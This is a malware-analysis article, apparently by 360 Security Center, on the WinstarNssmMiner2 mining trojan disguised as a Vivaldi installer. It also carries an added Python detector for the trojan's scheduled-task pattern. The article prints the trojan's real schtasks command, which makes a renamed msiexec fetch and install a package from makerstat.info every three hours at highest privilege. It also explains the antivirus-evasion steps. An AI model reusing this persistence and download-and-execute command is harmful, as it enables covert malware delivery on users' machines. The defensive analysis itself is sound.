Mining trojan strikes again! WinstarNssmMiner2 interceptions already exceed 200,000

Around the turn of the month, the WinstarNssmMiner mining trojan that 360 Security Center had previously monitored became active again; in just two days the number of interceptions exceeded 200,000. Security researchers have named this variant WinstarNssmMiner2. Its characteristic is that it disguises itself as the installer package of commonly used software such as the Vivaldi browser to trick users into downloading it. Because this trick is hard for users to notice, security researchers recommend that users download software from the official website or from 360 Software Manager whenever possible, to keep their computers safe.

Trojan analysis

Taking the Vivaldi browser as an example: the trojan disguised as this browser's installer is a software package built with the MSI installer, and the malware author abuses the installer's download-and-execute function to fetch the mining trojan onto the computer while bypassing antivirus interception. Unpacking the fake Vivaldi installer reveals a number of batch files, a password-protected Zip archive, and the Unzip tool used to handle Zip files.


Figure 1: Files inside the installer package

After the trojan starts, it first runs the U.bat file in the installer package, which calls Unzip to decompress the archive with the password X12, extracting the Nircmd program.


Figure 2: Calling Unzip to decompress the archive

C.bat is then executed. Its job is to check whether the user's computer has Kaspersky, ESET or DrWeb antivirus installed; if any of them is detected, it terminates the installer's Msiexec.exe process and deletes the trojan files, so the virus self-destructs.


Figure 3: If Kaspersky, ESET or DrWeb is installed, the virus self-destructs

If C.bat finds none of the three antivirus products above, Nir.bat is executed to call the Nircmd program, which in turn starts I.bat.


Figure 4: Executing Nir.bat calls Nircmd

This program solves the problem of launching with administrator privileges; through I.bat it adds a scheduled task for persistence. The trojan copies the system's Msiexec.exe to a randomly named file, then concatenates the domain name makerstat.info with a random name matching the executable (.exe) to generate a URL, composes the scheduled task content, and then uses the download-and-execute function of the MSI installer itself to bypass antivirus interception.


Figure 5: Generating the scheduled task content

The command executed by the trojan, as extracted in our analysis, is:

Schtasks /create /tn "TEST-xxx" /tr "'C:\WINDOWS\System32\3164326753.exe' /i Http://makerstat.info/26753.rar /q" /sc Minute /mo 180 /rl Highest /f

Here 3164326753.exe is actually the Msiexec.exe file. The figure below shows the scheduled task that was created:


Figure 6: The generated scheduled task

The URL cannot currently be accessed, so it appears that the trojan's main purpose for now is to establish a startup entry that is not yet live, creating a channel through which new trojans can be distributed at any time: once the trojan author puts a trojan online at that URL, every infected machine will request and execute it every 3 hours. And this MSI trojan is in fact the WinstarNssmMiner mining trojan we analyzed before. For the subsequent process, see the earlier article:

Http://sh.qihoo.com/pc/detail? Url=http%3A%2F%2Fzm.news.so.com%2F5d72f37ae3d204686153caa932fbb06e&check=a5a83191f0df8646&sign=llq&uid=test_zm
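As an added defender's example (not code from the 360 article), the following Python script scores schtasks command lines, such as those captured in process-creation logs, against the persistence pattern in the command above: an MSI package installed straight from a URL, launched by a program that is not named msiexec.exe, on a minute-based trigger with /rl Highest. The sample command lines are constructed; the first reproduces the article's command and the other two are benign controls.

```python
import re

# Constructed sample schtasks command lines. The first mirrors the command the
# article reproduces; the other two are benign controls (not from the article).
SAMPLE_CMDLINES = [
    'Schtasks /create /tn "TEST-xxx" /tr "\'C:\\WINDOWS\\System32\\3164326753.exe\' '
    '/i Http://makerstat.info/26753.rar /q" /sc Minute /mo 180 /rl Highest /f',
    'schtasks /create /tn "NightlyBackup" /tr "C:\\Tools\\backup.exe --full" /sc daily /st 02:00',
    'schtasks /create /tn "Updater" /tr "msiexec.exe /i C:\\Setup\\app.msi /qn" /sc onlogon',
]

# Switches of interest; values may be "double-quoted" or bare tokens.
SWITCH_RE = re.compile(r'/(tn|tr|sc|mo|rl)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
# msiexec-style install switch pointing at a remote package.
REMOTE_INSTALL_RE = re.compile(r'/i\s+(https?://\S+)', re.IGNORECASE)


def parse_switches(cmdline):
    """Return {switch: value} for the schtasks switches we care about."""
    return {m.group(1).lower(): m.group(2) if m.group(2) is not None else m.group(3)
            for m in SWITCH_RE.finditer(cmdline)}


def action_binary(tr):
    """Return the file name of the program launched by the /tr value."""
    tr = tr.strip()
    # The article's sample wraps the path in single quotes inside the /tr string.
    exe = tr[1:].split(tr[0], 1)[0] if tr[:1] in ("'", '"') else tr.split()[0]
    return exe.rsplit("\\", 1)[-1].lower()


def score_task(cmdline):
    """List the indicators of the WinstarNssmMiner2 pattern present in cmdline."""
    sw = parse_switches(cmdline)
    tr = sw.get("tr", "")
    hits = []
    m = REMOTE_INSTALL_RE.search(tr)
    if m:  # package installed straight from a URL, as in the article's command
        hits.append("msi-install-from-url:" + m.group(1))
        if action_binary(tr) != "msiexec.exe":  # msiexec switches under another name
            hits.append("renamed-msiexec-candidate:" + action_binary(tr))
    if sw.get("sc", "").lower() == "minute":  # short repeating trigger (/mo 180 = 3 h)
        hits.append("minute-trigger:" + sw.get("mo", "1"))
    if sw.get("rl", "").lower() == "highest":
        hits.append("highest-privilege")
    return hits


def scan(cmdlines):
    """Return {cmdline: hits} for every command line with at least one indicator."""
    return {c: h for c in cmdlines if (h := score_task(c))}


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_CMDLINES).items():
        print(cmd, "\n  ->", ", ".join(hits))
```

On a real host the same scoring can be applied to task actions exported from the Task Scheduler, since a renamed msiexec.exe copy only reveals itself through its msiexec-style arguments.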

After carrying out this series of mining-related operations, the installer does in fact install the Vivaldi browser on the user's computer.

At present only a small number of security products, including 360 Security Guard, can detect this kind of mining trojan.


Figure 7: Antivirus products that detect the WinstarNssmMiner2 mining trojan

Security reminder

Mining trojans have recently been very active domestically, and users should stay on guard against them. We recommend that users patch the system and third-party software promptly; when the computer freezes, slows down or shows other abnormal behaviour, use security software to scan it; keep security software running at all times so that protection stays in effect; and if you are tricked into running a malicious file, use 360 Security Guard to check for and remove the trojan as soon as possible.

In addition, 360 Security Guard has launched a mining trojan protection feature that comprehensively defends against mining trojans intruding through all kinds of channels. Once users enable this feature, 360 Security Guard will intercept all kinds of mining trojan attacks in real time and safeguard the security of the user's computer.

To equip your computer with protection, click >>>Http://urlqh.cn/m5rYE
